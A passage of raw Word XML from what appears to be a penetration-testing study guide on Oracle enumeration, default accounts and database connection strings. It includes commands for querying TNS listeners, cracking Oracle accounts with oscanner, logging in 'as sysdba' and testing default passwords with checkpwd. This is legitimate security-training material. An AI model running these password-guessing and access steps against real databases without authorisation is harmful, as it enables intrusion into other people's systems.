        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916119">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enumerating:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00916119" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916119">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>You can gather information from the tnslistener, (often not password protected on version 9i.) this holds important information such as the database version, instances or SID's, location of the log file, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00916119" w:rsidRDefault="00E8362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t>tnscmd.pl</w:t>
      </w:r>
      <w:r w:rsidR="00916119" w:rsidRPr="00916119">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping|version|status –h &lt;ip&gt; -p &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916119" w:rsidRPr="00916119" w:rsidRDefault="00E8362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t>tnscmd10g.pl</w:t>
      </w:r>
      <w:r w:rsidR="00916119" w:rsidRPr="00916119">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping|version|status –h &lt;ip&gt; -p &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00916119" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00916119" w:rsidRPr="00916119" w:rsidRDefault="00916119" w:rsidP="00916119">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916119">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use oscanner to detect/crack accounts: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00916119" w:rsidRDefault="0091611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lastRenderedPageBreak/>
        <w:t>oscanner.exe –s &lt;ip&gt; -r &lt;outfile&gt; -P &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916119" w:rsidRPr="00916119" w:rsidRDefault="00916119" w:rsidP="00916119">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00916119">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>reportviewer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00916119">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00916119" w:rsidRPr="00916119" w:rsidRDefault="00916119" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Derivation of version and patch information fro</w:t>
      </w:r>
      <w:r>
        <w:t>m hosts running Oracle software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="00CC2019" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRPr="00CC2019" w:rsidRDefault="00946CD8" w:rsidP="00946CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply load sqlplus with a similar command to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRPr="007E480B" w:rsidRDefault="00946CD8" w:rsidP="007E480B">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E480B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sqlplus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E480B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;username&gt;/&lt;password&gt;@&lt;ip_address&gt;/&lt;SID&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E480B" w:rsidRDefault="007E480B" w:rsidP="00946CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRPr="00CC2019" w:rsidRDefault="007E480B" w:rsidP="00946CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00946CD8" w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRPr="007E480B" w:rsidRDefault="00946CD8" w:rsidP="007E480B">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E480B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sqlplus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E480B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;username&gt;/&lt;password&gt;@&lt;ip_address&gt;/&lt;SID&gt; 'as sysdba';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E480B" w:rsidRPr="00CC2019" w:rsidRDefault="007E480B" w:rsidP="00946CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>J2b - Default Oracle accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="00916119" w:rsidP="009750CD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E63E1">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DefaultOraclePassword.mht</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRDefault="00946CD8" w:rsidP="009750CD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00946CD8" w:rsidRPr="009C0246" w:rsidRDefault="00946CD8" w:rsidP="009750CD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>checkpwd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C0246" w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0246" w:rsidRPr="009C0246" w:rsidRDefault="009C0246" w:rsidP="009C024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9C0246">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>checkpwd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -quiet system/manager@mydbserver:port/SID default_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J3 - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Web / App / Database Connectivity</w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication m</w:t>
      </w:r>
      <w:r>
        <w:t>ethods used by web applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MS-SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Using ODBC or JDBC authentication is in the connection string.</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sidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL ODBC connection strings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00BD601E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>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"Driver</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQLServer};Server=Your_Server_Name;Database=Your_Database_Name;Uid=Your_Username;Pwd=Your_Password;"</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"Driver</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQLServer};Server=Your_Server_Name;Database=Your_Database_Name;Trusted_Connection=yes;"</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sidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL OLE DB connection strings</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"Provider=SQLOLEDB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Source=Yo</w:t>
      </w:r>
      <w:r w:rsidR="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ur_Server_Name;Initial Catalog=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your_Database_Name;UserId=Your_Username;Password=Your_Password;"</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"Provider=SQLOLEDB</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Source=Your_Server_Name;Initial Catalog=Your_Database_Name;Integrated Security=SSPI;"</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Pr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL SqlConnection .NET strings</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"Data Source=Yo</w:t>
      </w:r>
      <w:r w:rsidR="00BD601E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ur_Server_Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD601E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Initial</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD601E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Catalog=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your_Database_Name;UserId=Your_Username;Password=Your_Password;"</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"Server=Your_Server_Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=Your_Database_Nam</w:t>
      </w:r>
      <w:r w:rsidR="00BD601E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e;UserID=Your_Username;Password=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your_Password;Trusted_Connection=False"</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"Data Source=Your_Server_Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Initial</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Catalog=Your_Database_Name;Integrated Security=SSPI;"</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"Server=Your_Server_Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">=Your_Database_Name;Trusted_Connection=True;" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00BD601E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00BD601E" w:rsidRDefault="00C4753E" w:rsidP="00C4753E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Connection to Oracle can be through a TNS connection, LDAP connection, OS authentication, proxy authentication</w:t>
      </w:r>
      <w:r w:rsidR="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</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1. </w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00BD601E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Oracle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lastRenderedPageBreak/>
        <w:t>Open connection to Oracle database using ODBC</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 {Microsoft ODBCforOracle}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=Your_Oracle_Server.world;Uid=Your_Username;Pwd=Your_Password;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD601E" w:rsidRDefault="00BD601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Oracle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Oracle database with standard security:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00EB3DB7" w:rsidRDefault="00EB3DB7" w:rsidP="00EB3DB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"Provider=MSDAORA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;Data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Source=</w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Your_Oracle_Database;UserId=Your_Username;Password=Your_Password;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4753E" w:rsidRPr="00EB3DB7" w:rsidRDefault="00EB3DB7" w:rsidP="00EB3DB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"Provider=</w:t>
      </w:r>
      <w:r w:rsidR="00C4753E" w:rsidRPr="00EB3DB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
